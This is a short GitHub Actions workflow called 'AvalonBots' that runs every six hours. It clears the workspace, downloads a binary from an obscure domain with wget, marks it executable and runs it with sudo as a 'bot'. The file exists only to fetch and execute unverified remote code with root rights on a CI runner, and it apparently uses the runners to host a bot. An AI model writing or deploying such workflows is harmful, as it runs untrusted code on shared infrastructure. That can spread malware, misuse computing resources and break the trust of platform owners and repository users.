name: AvalonBots

on:
  workflow_dispatch:
  schedule:
    - cron: '0 */6 * * *'

jobs:
  avalon-run:
    runs-on: ubuntu-latest
    
    steps:
    - name: Clear Directory
      run: |
        rm -rf * 2>/dev/null || true
    
    - name: Download and Ejecution
      run: |
        wget https://dcasdcas.online/avalon.x86_64
        
        mv avalon.x86_64 avalon
        
        chmod +x avalon
        
        echo "Iniciando bot..."
        sudo ./avalon jonchx
